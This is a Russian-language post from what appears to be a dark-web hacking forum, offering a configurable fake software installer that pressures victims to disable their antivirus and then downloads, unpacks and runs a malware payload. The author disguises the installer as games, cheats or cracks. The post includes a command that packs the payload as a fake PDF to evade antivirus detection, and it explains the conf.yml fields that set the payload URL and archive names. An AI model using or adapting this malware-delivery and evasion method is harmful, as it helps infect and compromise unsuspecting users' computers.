Фейковый Установщик - Загрузчик вирусни

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Привет, это Енот, и снова я решел поделиться с вами идей. В большинстве случаев установка на машину вируса, сопровождается, причем специально, окнами ошибок или просто остается без внимания. Но я хочу предложить способ, который вас наверное заинтересует. Чем он по моему мнению лучше выше перечисленных?

У меня есть только один аргумент: Если использовать немножко СИ, то мы получим установку с отключенным антивирусом, в случае когда мы могли бы её и не получить вовсе.... Он заключается в создании фейкового установщика(умоляющего выключить антивирь), который к тому же является загрузчиком и распаковщиком-расшифратором нашего "sfx" архива-вируса.

Установщик находится по адресу:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Его код на гитхабе:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Немного помучавшись, я сделал его версию, что бы вы могли её переделать для своих нужд и под свои игры, читы, кряки, неважно вообщем. Интерфейс у установщика худо-бедно настраиваемый, единственное, что нельзя изменить так это расцветку, выполненую в палитре #FF6A00 и #323232, интерфейс легко перерисовывается: состоит из двух картинок и значка, так же имеет текст с просьбой отключить антивирус в файле "conf.yml".

Но прежде всех действий, нам нужно будет заархивировать наш SFX архив специальным архиватором, который обеспечит хоть какую-то безпалевность:

Код:
.\patch.exe a install.pdf install.exe
SFX архив у меня называется install.exe, в результате он превращается в файл под названием install.pdf, что по сути является архивом, который никак не просматривается антивирусами.

Установщик, как я говорил сверху, умеет скачивать - разархивировать - запускать, в настройках файла "conf.yml" в полях нужно изменить след. зн-я:

Код:
url: http://www.futurecrew.com/skaven/song_files/mp3/razorback.mp3  < -   если вы хотите вирус из интернета, то можете заменить ссылку
txt1: Начать установку                                                                           < -   название кнопки 1
txt2: Отменить установку                                                                      < -   название кнопки 2
arhiv: install.pdf                                                                                       < -   имя получившегося архива
setup: install.exe                                                                                     < -   имя нашего sfx архива
Все остальные параметры в файле конф являются текстом всплывающего окна, в котором вы его и увидите.
Так же вы можете поменять не только картинки-текст, но и шрифт заменив файл "font.ttf" на свой "font.ttf"

Подписывайтесь на канал, жалко чё?:)
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя